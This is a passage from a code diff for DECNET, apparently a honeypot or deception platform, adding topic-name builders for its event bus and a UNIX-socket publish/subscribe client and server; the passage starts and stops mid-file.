    one of the ``MUTATION_*`` constants as *state*.
    """
    _reject_tokens(topology_id, state)
    return "{}.{}.mutation.{}".format(TOPOLOGY, topology_id, state)
 def topology_status(topology_id: str) -> str:
    """Return the status topic ``topology.<id>.status`` for one topology.
    *topology_id* is vetted by :func:`_reject_tokens` (single segment).
    """
    _reject_tokens(topology_id)
    segments = (TOPOLOGY, topology_id, TOPOLOGY_STATUS)
    return "{}.{}.{}".format(*segments)
 def decky(decky_id: str, event_type: str) -> str:
    """Return the per-decky topic ``decky.<id>.<event_type>``.
    *event_type* is one of the single-token ``DECKY_*`` leaves, for
    example :data:`DECKY_STATE` or :data:`DECKY_TRAFFIC`.  Both
    arguments pass through :func:`_reject_tokens`, so a dotted or
    wildcarded value raises :class:`ValueError`.
    """
    _reject_tokens(decky_id, event_type)
    topic = f"{DECKY}.{decky_id}.{event_type}"
    return topic
 def decky_mutation(decky_id: str) -> str:
    """Return ``decky.<id>.mutation`` after validating *decky_id*."""
    _reject_tokens(decky_id)
    return "{}.{}.{}".format(DECKY, decky_id, DECKY_MUTATION)
 def decky_lifecycle(decky_id: str) -> str:
    """Return ``decky.<id>.lifecycle`` after validating *decky_id*."""
    _reject_tokens(decky_id)
    segments = (DECKY, decky_id, DECKY_LIFECYCLE)
    return "{}.{}.{}".format(*segments)
 def system(event_type: str) -> str:
    """Return ``system.<event_type>``.
    Only emptiness is checked here: *event_type* may carry dots
    (``bus.health``) because the leaves handed to this helper are
    already-constant values, so it merely adds the root prefix.
    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{SYSTEM}.{event_type}"
    raise ValueError("system topic requires a non-empty event_type")
 def credential(event_type: str) -> str:
    """Return ``credential.<event_type>``.
    Callers normally pass :data:`CREDENTIAL_CAPTURED` or
    :data:`CREDENTIAL_REUSE_DETECTED`.  A dotted leaf such as
    ``reuse.detected`` is accepted, for the same reason as in
    :func:`system`; only an empty value is refused.
    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{CREDENTIAL}.{event_type}"
    raise ValueError("credential topic requires a non-empty event_type")
 def attacker(event_type: str) -> str:
    """Return ``attacker.<event_type>``.
    Typical leaves are ``ATTACKER_OBSERVED``, ``ATTACKER_SCORED``,
    ``ATTACKER_SESSION_STARTED`` and ``ATTACKER_SESSION_ENDED``.  A
    dotted leaf (``session.started``) is accepted, for the same reason
    as in :func:`system`; only an empty value is refused.
    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{ATTACKER}.{event_type}"
    raise ValueError("attacker topic requires a non-empty event_type")
 def attacker_observation(primitive: str) -> str:
    """Return ``attacker.observation.<primitive>``.
    *primitive* is the fully-qualified BEHAVE-SHELL primitive path, e.g.
    ``motor.input_modality``, ``cognitive.feedback_loop_engagement`` or
    ``motor.shell_mastery.tab_completion``.  Dots inside it are kept
    as-is: this matches what
    ``behave_shell.spec.event_adapter.event_topic_for`` produces
    upstream, and mirrors how :func:`attacker` admits
    ``session.started``.
    An empty string raises :class:`ValueError` so that a downstream typo
    cannot ship as ``attacker.observation.``.
    """
    if primitive:
        return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
    raise ValueError(
        "attacker_observation topic requires a non-empty primitive",
    )
 def attribution(event_type: str) -> str:
    """Return ``attribution.<event_type>``.
    Callers normally pass :data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
    :data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED`.  Both hold a dot
    (``profile.state_changed``), which is fine under the same
    "trailing dotted leaf" rule that ``attacker.session.started``
    relies on; only an empty value is refused.
    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{ATTRIBUTION}.{event_type}"
    raise ValueError("attribution topic requires a non-empty event_type")
 def campaign(event_type: str) -> str:
    """Return ``campaign.<event_type>``.
    Callers normally pass :data:`CAMPAIGN_FORMED`,
    :data:`CAMPAIGN_IDENTITY_ASSIGNED`, :data:`CAMPAIGN_MERGED` or
    :data:`CAMPAIGN_UNMERGED`.  A dotted leaf (``identity.assigned``)
    is accepted, for the same reason as in :func:`system`.
    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{CAMPAIGN}.{event_type}"
    raise ValueError("campaign topic requires a non-empty event_type")
 def identity(event_type: str) -> str:
    """Return ``identity.<event_type>``.
    Callers normally pass :data:`IDENTITY_FORMED`,
    :data:`IDENTITY_OBSERVATION_LINKED`, :data:`IDENTITY_MERGED` or
    :data:`IDENTITY_UNMERGED`.  A dotted leaf (``observation.linked``)
    is accepted, for the same reason as in :func:`system`.
    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{IDENTITY}.{event_type}"
    raise ValueError("identity topic requires a non-empty event_type")
 def orchestrator(event_type: str, decky_id: str) -> str:
    """Build ``orchestrator.<event_type>.<decky_id>``.
    *event_type* should be one of :data:`ORCHESTRATOR_TRAFFIC`,
    :data:`ORCHESTRATOR_FILE`, or :data:`ORCHESTRATOR_EMAIL`. The
    destination decky is always the third token so per-decky subscribers
    can use ``orchestrator.*.<decky_uuid>``.
    Both arguments are validated by :func:`_reject_tokens`, which raises
    :class:`ValueError` for an empty, dotted, wildcarded, or
    whitespace-bearing segment.
    """
    _reject_tokens(event_type, decky_id)
    return f"{ORCHESTRATOR}.{event_type}.{decky_id}"
 def canary(token_id: str, event_type: str) -> str:
    """Return ``canary.<token_id>.<event_type>``.
    Pass :data:`CANARY_PLACED`, :data:`CANARY_TRIGGERED` or
    :data:`CANARY_REVOKED` as *event_type*.  Because the token id sits
    in the second position, a per-token subscriber can listen on
    ``canary.<token_id>.>`` while fleet-wide consumers (webhook fanout,
    correlator) listen on ``canary.>``.
    Both arguments are vetted by :func:`_reject_tokens`.
    """
    _reject_tokens(token_id, event_type)
    return "{}.{}.{}".format(CANARY, token_id, event_type)
 def system_health(worker: str) -> str:
    """Return ``system.<worker>.health``.
    Heartbeats are nested one level below ``system`` so that a consumer
    can watch every worker through ``system.*.health`` or a single one
    through e.g. ``system.mutator.health``.  *worker* is vetted by
    :func:`_reject_tokens` like any ordinary segment: no dots,
    wildcards, or whitespace.
    """
    _reject_tokens(worker)
    topic = f"{SYSTEM}.{worker}.{SYSTEM_HEALTH}"
    return topic
 def system_control(worker: str) -> str:
    """Build ``system.<worker>.control``.
    Admin-originated stop (and, eventually, start) intents are published
    here; the worker in question subscribes to its own address and reacts.
    Payload shape::
        {"action": "stop", "requested_by": "<username>", "ts": <unix>}
    The ``action`` vocabulary is :data:`WORKER_CONTROL_STOP` /
    :data:`WORKER_CONTROL_START`, but only ``stop`` is handled in v1:
    ``start`` is reserved and, like any unrecognised value, is not acted
    on.  Same segment rules as :func:`system_health` — *worker* is
    validated by :func:`_reject_tokens`, which raises
    :class:`ValueError` on a malformed segment.
    """
    _reject_tokens(worker)
    return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
 def smtp(event_type: str) -> str:
    """Return ``smtp.<event_type>``.
    Dots inside *event_type* are allowed (e.g. ``probe.pending``); only
    an empty value is refused, with :class:`ValueError`.
    """
    if event_type:
        return f"{SMTP}.{event_type}"
    raise ValueError("smtp topic requires a non-empty event_type")
 def email_topic(event_type: str) -> str:
    """Return ``email.<event_type>``.
    The helper is called ``email_topic`` instead of ``email`` so that it
    does not shadow Python's stdlib ``email`` package at import sites
    that need both.  *event_type* is normally :data:`EMAIL_RECEIVED`.
    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{EMAIL}.{event_type}"
    raise ValueError("email topic requires a non-empty event_type")
 def ttp(event_type: str) -> str:
    """Return ``ttp.<event_type>``.
    Callers normally pass :data:`TTP_TAGGED`, :data:`TTP_RULE_FIRED` or
    :data:`TTP_RULE_SUPPRESSED`.  A dotted leaf (``rule.fired``) is
    accepted, for the same reason as in :func:`system`.  When a
    per-technique topic is wanted, call :func:`ttp_rule_fired` instead.
    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{TTP}.{event_type}"
    raise ValueError("ttp topic requires a non-empty event_type")
 def ttp_rule_fired(technique_id: str) -> str:
    """Build ``ttp.rule.fired.<technique_id>``.
    Per-technique fan-out: SIEM subscribers can listen on
    ``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
    one technique. *technique_id* is validated as a single segment —
    sub-techniques like ``T1110.001`` are rejected because they would
    split into two tokens. The topic key is the parent technique;
    ``sub_technique_id`` lives in the payload.
    Raises :class:`ValueError` (via :func:`_reject_tokens`) when
    *technique_id* is empty or contains ``.``, ``*``, ``>``, or
    whitespace.
    """
    _reject_tokens(technique_id)
    # Use the shared leaf constant (as ttp_rule_reloaded / ttp_rule_state
    # do) so the topic prefix cannot drift from TTP_RULE_FIRED.
    return f"{TTP}.{TTP_RULE_FIRED}.{technique_id}"
 def ttp_rule_reloaded(rule_id: str) -> str:
    """Return ``ttp.rule.reloaded.<rule_id>``.
    This is the per-rule topic the
    :class:`~decnet.ttp.store.base.RuleStore` fires on whenever a rule's
    *definition* changes — a YAML edit on the filesystem backend, or a
    ``ttp_rule`` row update on the database backend.  Each per-rule edit
    yields exactly one event and edits are never batched (the
    "incremental, never batched" property in TTP_TAGGING.md §"Bus
    topics" takes its granularity from
    :meth:`RuleStore.subscribe_changes`).
    Subscribe to ``ttp.rule.reloaded.>`` for all rules or to
    ``ttp.rule.reloaded.R0001`` for a single one.  *rule_id* is vetted
    by :func:`_reject_tokens` as a single segment.
    """
    _reject_tokens(rule_id)
    return "{}.{}.{}".format(TTP, TTP_RULE_RELOADED, rule_id)
 def ttp_rule_state(rule_id: str) -> str:
    """Return ``ttp.rule.state.<rule_id>``.
    This is the per-rule topic the
    :class:`~decnet.ttp.store.base.RuleStore` fires on whenever a rule's
    *operational state* changes — for instance the operator presses the
    disable button, or an ``expires_at`` TTL elapses and the state
    auto-reverts.  *rule_id* is vetted by :func:`_reject_tokens` as a
    single segment.
    """
    _reject_tokens(rule_id)
    segments = (TTP, TTP_RULE_STATE, rule_id)
    return "{}.{}.{}".format(*segments)
 def _reject_tokens(*parts: str) -> None:
    """Reject topic segments that would break NATS-style tokenization.
    Dots, wildcards, whitespace, and empty strings in a *segment* would
    silently corrupt the hierarchy (e.g. ``topology.a.b.status`` for a
    ``topology_id`` of ``"a.b"``).  Raise early at the builder instead of
    shipping a malformed topic to the wire.
    """
    for p in parts:
        if not p:
            raise ValueError("topic segment must not be empty")
        if "." in p or "*" in p or ">" in p or any(c.isspace() for c in p):
            raise ValueError(
                f"topic segment {p!r} may not contain '.', '*', '>', or whitespace"
            )
--- a/decnet/bus/unix_client.py
+++ b/decnet/bus/unix_client.py
@@ -0,0 +1,258 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """UNIX-socket client — :class:`UnixSocketBus` implementation of :class:`BaseBus`.
 Holds one open socket to the local :class:`~decnet.bus.unix_server.BusServer`.
 Operations:
 * :meth:`publish` writes a single ``PUB`` frame and returns; no ack.
 * :meth:`subscribe` writes a ``SUB`` frame and returns a
  :class:`~decnet.bus.base.Subscription` backed by an :class:`asyncio.Queue`
  that the background reader task feeds.
 One background reader task per bus instance dispatches incoming ``EVT``
 frames to every registered subscription whose pattern matches the topic.
 On connection drop or close, every subscription is woken via a sentinel so
 iterators unblock cleanly; the subscription's ``__anext__`` raises
 :class:`StopAsyncIteration`, so a caller's ``async for`` loop simply ends.
 No auto-reconnect in MVP.  If the server restarts, callers must
 :meth:`close` the bus and construct a new one.  This mirrors how other
 DECNET workers handle their dependencies — the systemd ``Restart=on-failure``
 supervision above us is the retry loop.
 """
 from __future__ import annotations
 import asyncio
 import contextlib
 import os
 import pathlib
 from typing import Any
 from decnet.bus import protocol
 from decnet.bus.base import (
    BaseBus,
    Event,
    Subscription,
    _CLOSE_SENTINEL,
    matches,
 )
 from decnet.bus.fake import _enqueue_drop_oldest as _enqueue_event_drop_oldest
 from decnet.logging import get_logger
 # Module-level logger for the bus client.
 log = get_logger("bus.client")
 # Capacity (``maxsize``) of the asyncio queue created for each local
 # subscription in ``UnixSocketBus.subscribe``.
 _INBOUND_QUEUE_SIZE = 1024
 class _UnixSubscription(Subscription):
    """Queue-backed :class:`Subscription` handed out by :class:`UnixSocketBus`.
    The owning bus places matching events on ``_queue``; a close sentinel
    on the queue tells the iterator to stop.
    """
    def __init__(
        self,
        bus: "UnixSocketBus",
        pattern: str,
        queue: "asyncio.Queue[Any]",
    ) -> None:
        super().__init__(pattern)
        self._queue = queue
        self._bus = bus
    async def __anext__(self) -> Event:
        """Return the next event, or stop once closed / the sentinel arrives."""
        if not self._closed:
            entry = await self._queue.get()
            if entry is not _CLOSE_SENTINEL:
                return entry
        raise StopAsyncIteration
    async def _aclose(self) -> None:
        """Detach from the bus, then best-effort wake a pending ``__anext__``."""
        await self._bus._unregister(self)
        # A full queue means no consumer is blocked on ``get()``, so failing
        # to enqueue the sentinel is tolerated here.
        with contextlib.suppress(asyncio.QueueFull):
            self._queue.put_nowait(_CLOSE_SENTINEL)
 class UnixSocketBus(BaseBus):
    """Client handle for a local :class:`BusServer`.
    One instance per process typically; multiple instances simply open
    multiple sockets to the same server.  Connection is lazy — the first
    :meth:`connect` (or any publish/subscribe call via ``async with``)
    opens the socket.
    Concurrent first-use callers (e.g. a :meth:`publish` racing the SUB
    task scheduled by :meth:`subscribe`) are serialized by an internal
    lock, so at most one socket and one reader task are created.
    """
    def __init__(
        self,
        socket_path: pathlib.Path | str,
        *,
        client_name: str | None = None,
    ) -> None:
        """Record configuration only; no socket is opened until :meth:`connect`.
        *client_name* is sent in the ``HELLO`` frame; it defaults to
        ``decnet-bus-client[<pid>]``.
        """
        self._path = pathlib.Path(socket_path)
        self._client_name = client_name or f"decnet-bus-client[{os.getpid()}]"
        self._reader: asyncio.StreamReader | None = None
        self._writer: asyncio.StreamWriter | None = None
        self._reader_task: asyncio.Task[None] | None = None
        self._subs: list[_UnixSubscription] = []
        # Serializes connect() so racing callers cannot open two sockets.
        self._lock = asyncio.Lock()
        # Serializes frame writes so frames never interleave on the wire.
        self._write_lock = asyncio.Lock()
        self._closed = False
        # Strong references to in-flight SUB tasks.  The event loop only
        # keeps weak references to tasks, so an unreferenced task may be
        # garbage-collected before it runs to completion.
        self._sub_tasks: set[asyncio.Future[None]] = set()
        # Sticky flag: the first publish-on-closed-bus call logs at
        # WARNING so operators see that a publish was dropped; subsequent
        # calls on the same instance log at DEBUG only to prevent a
        # log flood when stream threads drain after close.  The bus is
        # critical infra, so the first warning is non-negotiable.
        self._closed_publish_warned = False
    # ─── Lifecycle ──────────────────────────────────────────────────────────
    async def connect(self) -> None:
        """Open the socket, send ``HELLO`` and start the reader task.
        Idempotent: returns immediately when already connected.  Raises
        :class:`RuntimeError` when the bus has been closed.
        """
        if self._writer is not None:
            return
        if self._closed:
            raise RuntimeError("connect on closed bus")
        async with self._lock:
            # Re-check under the lock: another caller may have connected
            # (or the bus may have been closed) while we were waiting.
            if self._writer is not None:
                return
            if self._closed:
                raise RuntimeError("connect on closed bus")
            self._reader, self._writer = await asyncio.open_unix_connection(str(self._path))
            await self._send(protocol.encode(protocol.HELLO, args=self._client_name))
            self._reader_task = asyncio.create_task(self._reader_loop())
            log.debug("bus.client: connected to %s as %s", self._path, self._client_name)
    async def close(self) -> None:
        """Send a best-effort ``BYE``, tear down I/O and wake every subscription.
        Safe to call more than once.
        """
        if self._closed:
            return
        self._closed = True
        # Best-effort BYE — we don't care if it fails.
        if self._writer is not None and not self._writer.is_closing():
            with contextlib.suppress(Exception):
                await self._send(protocol.encode(protocol.BYE))
        if self._reader_task is not None:
            self._reader_task.cancel()
            with contextlib.suppress(asyncio.CancelledError):
                await self._reader_task
            self._reader_task = None
        if self._writer is not None:
            with contextlib.suppress(Exception):
                self._writer.close()
                await self._writer.wait_closed()
            self._writer = None
            self._reader = None
        # Wake every subscription so `async for` exits.
        self._wake_subscriptions()
        self._subs.clear()
    # ─── Pub/Sub ────────────────────────────────────────────────────────────
    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        """Write one ``PUB`` frame for *topic*; there is no acknowledgement.
        Publishing on a closed bus, or hitting a connection error while
        writing, is logged and swallowed rather than raised.
        """
        if self._closed:
            # Degrade gracefully: the DB is the source of truth, the bus
            # is only the notification layer.  Raising here made every
            # caller via publish_safely flood the logs once per stream
            # line during shutdown races.  First drop warns loudly;
            # subsequent drops on the same instance are DEBUG-only.
            if not self._closed_publish_warned:
                self._closed_publish_warned = True
                log.warning(
                    "bus.client: publish on closed bus dropped topic=%s "
                    "(further drops on this instance logged at DEBUG)",
                    topic,
                )
            else:
                log.debug("bus.client: publish on closed bus dropped topic=%s", topic)
            return
        if self._writer is None:
            await self.connect()
        body = Event(topic=topic, payload=payload, type=event_type).to_dict()
        try:
            await self._send(protocol.encode(protocol.PUB, args=topic, body=body))
        except (ConnectionError, BrokenPipeError) as exc:
            # Bus loss is a logged warning, never a publisher crash.  The
            # DB-as-source-of-truth invariant means the work is already
            # persisted; the missing event is just a missed notification.
            log.warning("bus.client: publish failed: %s", exc)
    def subscribe(self, pattern: str) -> Subscription:
        """Register a local subscription for *pattern* and schedule its ``SUB`` frame.
        Raises :class:`RuntimeError` when the bus has been closed.
        """
        if self._closed:
            raise RuntimeError("subscribe on closed bus")
        queue: asyncio.Queue[Any] = asyncio.Queue(maxsize=_INBOUND_QUEUE_SIZE)
        sub = _UnixSubscription(self, pattern, queue)
        self._subs.append(sub)
        # Schedule the SUB frame asynchronously so subscribe() stays sync,
        # matching the BaseBus signature.  The caller will shortly `async
        # with` / `async for` the subscription, which will run the event
        # loop and pick this task up.
        task = asyncio.ensure_future(self._send_sub(pattern))
        # Hold a strong reference until the task finishes (see __init__).
        self._sub_tasks.add(task)
        task.add_done_callback(self._sub_tasks.discard)
        return sub
    async def _send_sub(self, pattern: str) -> None:
        """Connect if necessary and send ``SUB``; failures are logged, not raised."""
        try:
            if self._writer is None:
                await self.connect()
            await self._send(protocol.encode(protocol.SUB, args=pattern))
        except Exception as exc:  # pragma: no cover - network paths in live tests
            log.warning("bus.client: SUB %s failed: %s", pattern, exc)
    async def _unregister(self, sub: _UnixSubscription) -> None:
        """Forget *sub*; send ``UNSUB`` when it was the last user of its pattern."""
        try:
            self._subs.remove(sub)
        except ValueError:
            return
        # Tell the server we no longer want events for this pattern if no
        # other local subscription still wants it.
        if not any(s.pattern == sub.pattern for s in self._subs):
            with contextlib.suppress(Exception):
                await self._send(protocol.encode(protocol.UNSUB, args=sub.pattern))
    # ─── Internal I/O ───────────────────────────────────────────────────────
    async def _send(self, frame_bytes: bytes) -> None:
        """Write one encoded frame and drain; raises :class:`ConnectionError` if unconnected."""
        if self._writer is None:
            raise ConnectionError("bus.client: not connected")
        async with self._write_lock:
            self._writer.write(frame_bytes)
            await self._writer.drain()
    async def _reader_loop(self) -> None:
        """Read frames until EOF/``BYE``/error, dispatching each ``EVT``."""
        if self._reader is None:
            return
        try:
            while True:
                frame = await protocol.read_frame(self._reader)
                if frame is None:
                    break
                if frame.verb != protocol.EVT:
                    # Clients only ever legitimately receive EVT (or BYE).
                    if frame.verb == protocol.BYE:
                        break
                    log.warning("bus.client: unexpected verb from server: %s", frame.verb)
                    continue
                topic = frame.args
                data = protocol.decode_body(frame.body) if frame.body else {}
                event = Event.from_dict(topic, data)
                self._dispatch(event)
        except protocol.ProtocolError as exc:
            log.warning("bus.client: protocol error: %s", exc)
        except (asyncio.IncompleteReadError, ConnectionError):
            pass
        except asyncio.CancelledError:
            raise
        except Exception:  # pragma: no cover
            log.exception("bus.client: reader loop crashed")
        finally:
            # Server-side close — wake every subscription.
            self._wake_subscriptions()
    def _wake_subscriptions(self) -> None:
        """Put the close sentinel on every subscription queue.
        When a queue is full the oldest pending item is discarded to make
        room.  Silently skipping the sentinel instead would leave the
        consumer blocked forever on ``queue.get()`` once it had drained
        the backlog.
        """
        for sub in list(self._subs):
            queue = sub._queue
            try:
                queue.put_nowait(_CLOSE_SENTINEL)
            except asyncio.QueueFull:
                with contextlib.suppress(asyncio.QueueEmpty):
                    queue.get_nowait()
                with contextlib.suppress(asyncio.QueueFull):
                    queue.put_nowait(_CLOSE_SENTINEL)
    def _dispatch(self, event: Event) -> None:
        """Enqueue *event* on every local subscription whose pattern matches."""
        for sub in self._subs:
            if matches(sub.pattern, event.topic):
                _enqueue_event_drop_oldest(sub._queue, event)
--- a/decnet/bus/unix_server.py
+++ b/decnet/bus/unix_server.py
@@ -0,0 +1,310 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """UNIX-socket server for the DECNET bus.
 One :class:`BusServer` per host.  Accepts local connections on a UNIX-domain
 socket; each connection may:
 * publish events (``PUB`` frames) that the server fans out to all matching
  subscribers on other connections, and
 * subscribe to patterns (``SUB`` frames) and receive matching events as
  ``EVT`` frames.
 Authorization is socket file permissions (0660, group=``decnet`` if that
 POSIX group exists, else the server process's own group).  Anything the
 kernel lets ``connect()`` is trusted — there is no verb-level auth.  This
 matches the "local processes on the same host" threat model; cross-host
 federation is out of scope (see DEBT-029).
 Backpressure is per-connection, drop-oldest: if a subscriber can't drain its
 outbound queue fast enough, the server discards the oldest pending event
 rather than blocking publishers.  The bus is at-most-once by contract, so
 drops are acceptable; stalled publishers are not.
 """
 from __future__ import annotations
 import asyncio
 import contextlib
 import grp
 import os
 import pathlib
 from dataclasses import dataclass, field
 from typing import Any
 from decnet.bus import protocol
 from decnet.bus.base import Event, matches
 from decnet.logging import get_logger
 # Module-level logger for the bus server.
 log = get_logger("bus.server")
 # Default permission bits applied to the socket file (``BusServer(mode=...)``).
 _SOCKET_MODE = 0o660
 # Default POSIX group name for the socket file (``BusServer(group=...)``).
 _DEFAULT_GROUP = "decnet"
 # Capacity (``maxsize``) of each connection's outbound frame queue.
 _OUTBOUND_QUEUE_SIZE = 1024
@dataclass(eq=False)
 class _Connection:
    """Per-connection server state.
    ``eq=False`` keeps the default identity-based ``__eq__``/``__hash__``,
    which is what allows instances to be stored in the server's
    ``set[_Connection]``.
    """
    # Stream used to send frames to this peer.
    writer: asyncio.StreamWriter
    # Name announced by the peer's HELLO frame; placeholder until then.
    peer_name: str = "<unknown>"
    # Topic patterns this connection is currently subscribed to.
    patterns: set[str] = field(default_factory=set)
    # Encoded frames waiting to be written to this peer (bounded queue).
    outbound: asyncio.Queue[bytes] = field(
        default_factory=lambda: asyncio.Queue(maxsize=_OUTBOUND_QUEUE_SIZE)
    )
    # Set once the connection has been torn down.
    closed: bool = False
 class BusServer:
    """Serve a UNIX-socket bus on *socket_path*.
    Lifecycle: construct → :meth:`start` → :meth:`serve_forever` (or rely
    on :meth:`start` returning once bound) → :meth:`close` for teardown.
    Safe to :meth:`close` multiple times.
    """
    def __init__(
        self,
        socket_path: pathlib.Path | str,
        *,
        group: str | None = _DEFAULT_GROUP,
        mode: int = _SOCKET_MODE,
    ) -> None:
        """Record configuration only; nothing is bound until :meth:`start`."""
        self._path = pathlib.Path(socket_path)
        self._group = group
        self._mode = mode
        self._server: asyncio.base_events.Server | None = None
        self._connections: set[_Connection] = set()
        self._closed = False
    # ─── Lifecycle ──────────────────────────────────────────────────────────
    async def start(self) -> None:
        """Bind the socket and begin accepting connections.
        Removes any stale socket file at *socket_path* first (common case:
        the previous worker crashed without cleaning up).  The parent
        directory must already exist; we do NOT create it blindly because
        the chosen directory (typically ``/run/decnet``) may require
        systemd ``RuntimeDirectory=`` to set up.
        Raises :class:`FileNotFoundError` when the parent directory is
        missing.  Calling it again on a started server is a no-op.
        """
        if self._server is not None:
            return
        parent = self._path.parent
        if not parent.exists():
            raise FileNotFoundError(
                f"bus socket parent directory {parent} does not exist; "
                f"create it with systemd RuntimeDirectory= or mkdir"
            )
        # Clean up a stale socket from a previous crash.  If a live server
        # is actually listening there, ``bind()`` below will fail — we do
        # not try to detect live vs. stale ourselves.
        with contextlib.suppress(FileNotFoundError):
            if self._path.is_socket():
                self._path.unlink()
        self._server = await asyncio.start_unix_server(
            self._handle_connection, path=str(self._path),
        )
        _chmod_and_chown(self._path, self._mode, self._group)
        log.info("bus.server: listening on %s (mode=%o group=%s)",
                 self._path, self._mode, self._group or "<inherit>")
    async def serve_forever(self) -> None:
        """Accept connections until cancelled; requires :meth:`start` first."""
        if self._server is None:
            raise RuntimeError("BusServer not started")
        async with self._server:
            await self._server.serve_forever()
    async def close(self) -> None:
        """Stop listening, drop every connection and remove the socket file.
        Idempotent.
        """
        if self._closed:
            return
        self._closed = True
        server = self._server
        if server is not None:
            # Stop accepting new connections immediately.
            server.close()
        # Drop live connections BEFORE waiting on the listener: since
        # Python 3.12 ``Server.wait_closed()`` blocks until all active
        # connections have finished, so waiting first would hang for as
        # long as any client stays connected.
        for conn in list(self._connections):
            await self._close_connection(conn)
        self._connections.clear()
        if server is not None:
            with contextlib.suppress(Exception):
                await server.wait_closed()
            self._server = None
        with contextlib.suppress(FileNotFoundError):
            self._path.unlink()
        log.info("bus.server: closed")
    # ─── Internal publish fan-out ───────────────────────────────────────────
    async def publish(self, topic: str, payload: dict[str, Any], event_type: str = "") -> None:
        """Server-side publish helper — used by the worker to emit
        ``system.bus.health`` heartbeats without opening a client loop."""
        event = Event(topic=topic, payload=payload, type=event_type)
        self._fanout(event)
    # ─── Connection handler ─────────────────────────────────────────────────
    async def _handle_connection(
        self,
        reader: asyncio.StreamReader,
        writer: asyncio.StreamWriter,
    ) -> None:
        """Per-connection entry point passed to ``asyncio.start_unix_server``.
        Runs the reader loop inline and a writer task alongside it; all
        errors are logged here so one bad peer never takes the server down.
        """
        conn = _Connection(writer=writer)
        self._connections.add(conn)
        writer_task = asyncio.create_task(self._writer_loop(conn))
        try:
            await self._reader_loop(conn, reader)
        except protocol.ProtocolError as exc:
            log.warning("bus.server: protocol error from %s: %s", conn.peer_name, exc)
        except (asyncio.IncompleteReadError, ConnectionError) as exc:
            log.debug("bus.server: %s disconnected: %s", conn.peer_name, exc)
        except Exception:  # pragma: no cover - defensive
            log.exception("bus.server: unhandled error in connection")
        finally:
            await self._close_connection(conn)
            self._connections.discard(conn)
            writer_task.cancel()
            with contextlib.suppress(asyncio.CancelledError):
                await writer_task
    async def _reader_loop(
        self, conn: _Connection, reader: asyncio.StreamReader,
    ) -> None:
        """Read and dispatch frames until EOF or a ``BYE`` frame."""
        while True:
            frame = await protocol.read_frame(reader)
            if frame is None:
                return
            await self._dispatch(conn, frame)
            if frame.verb == protocol.BYE:
                return
    async def _dispatch(self, conn: _Connection, frame: protocol.Frame) -> None:
        """Apply one client frame to *conn*.
        Raises :class:`protocol.ProtocolError` for a ``SUB`` without a
        pattern, a ``PUB`` without a topic, or any verb a client may not send.
        """
        if frame.verb == protocol.HELLO:
            conn.peer_name = frame.args or conn.peer_name
            log.debug("bus.server: HELLO from %s", conn.peer_name)
            return
        if frame.verb == protocol.SUB:
            pattern = frame.args
            if not pattern:
                raise protocol.ProtocolError("SUB requires a pattern")
            conn.patterns.add(pattern)
            log.debug("bus.server: %s SUB %s", conn.peer_name, pattern)
            return
        if frame.verb == protocol.UNSUB:
            conn.patterns.discard(frame.args)
            return
        if frame.verb == protocol.PUB:
            topic = frame.args
            if not topic:
                raise protocol.ProtocolError("PUB requires a topic")
            data = protocol.decode_body(frame.body) if frame.body else {}
            event = Event(
                topic=topic,
                payload=data.get("payload", {}) or {},
                type=data.get("type", "") or "",
            )
            self._fanout(event, origin=conn)
            return
        if frame.verb == protocol.BYE:
            return
        # EVT is server-to-client only; receiving one is a protocol violation.
        raise protocol.ProtocolError(f"unexpected verb {frame.verb!r} from client")
    def _fanout(self, event: Event, *, origin: _Connection | None = None) -> None:
        """Enqueue *event* as an EVT frame on every matching connection.
        We do NOT deliver back to the originating connection (a publisher
        does not receive its own event).  Encoding happens once per event,
        not once per subscriber.
        """
        try:
            frame_bytes = protocol.encode(
                protocol.EVT, args=event.topic, body=event.to_dict(),
            )
        except protocol.ProtocolError:
            log.exception("bus.server: failed to encode EVT for topic=%s", event.topic)
            return
        for conn in self._connections:
            if conn is origin or conn.closed:
                continue
            if not any(matches(p, event.topic) for p in conn.patterns):
                continue
            _enqueue_drop_oldest(conn.outbound, frame_bytes, event.topic)
    async def _writer_loop(self, conn: _Connection) -> None:
        """Serialize writes onto *conn*'s socket.
        One writer task per connection so a slow peer only blocks its own
        queue, not the fan-out loop.  The queue is bounded with drop-oldest
        policy applied at enqueue time (see :func:`_enqueue_drop_oldest`).
        """
        try:
            while not conn.closed:
                data = await conn.outbound.get()
                conn.writer.write(data)
                await conn.writer.drain()
        except (ConnectionError, BrokenPipeError):
            log.debug("bus.server: %s writer: peer closed", conn.peer_name)
        except asyncio.CancelledError:
            pass
        except Exception:  # pragma: no cover - defensive
            log.exception("bus.server: writer loop crashed for %s", conn.peer_name)
    async def _close_connection(self, conn: _Connection) -> None:
        """Mark *conn* closed and close its writer; repeated calls are no-ops."""
        if conn.closed:
            return
        conn.closed = True
        with contextlib.suppress(Exception):
            conn.writer.close()
            await conn.writer.wait_closed()
 # ─── Helpers ─────────────────────────────────────────────────────────────────
 def _chmod_and_chown(path: pathlib.Path, mode: int, group: str | None) -> None:
    """Apply socket file perms and best-effort group ownership.
    If *group* is ``None`` or the named group does not exist, we leave the
    socket owned by the current process group.  This keeps the server
    usable on dev boxes that don't have a ``decnet`` group set up.
    """
    try:
        os.chmod(path, mode)
    except OSError as exc:
        log.warning("bus.server: chmod(%s, %o) failed: %s", path, mode, exc)
    if not group:
        return
    try:
        gid = grp.getgrnam(group).gr_gid
    except KeyError:
        log.debug("bus.server: group %r not found, leaving socket group unchanged", group)
        return
    try:
        os.chown(path, -1, gid)
    except PermissionError:
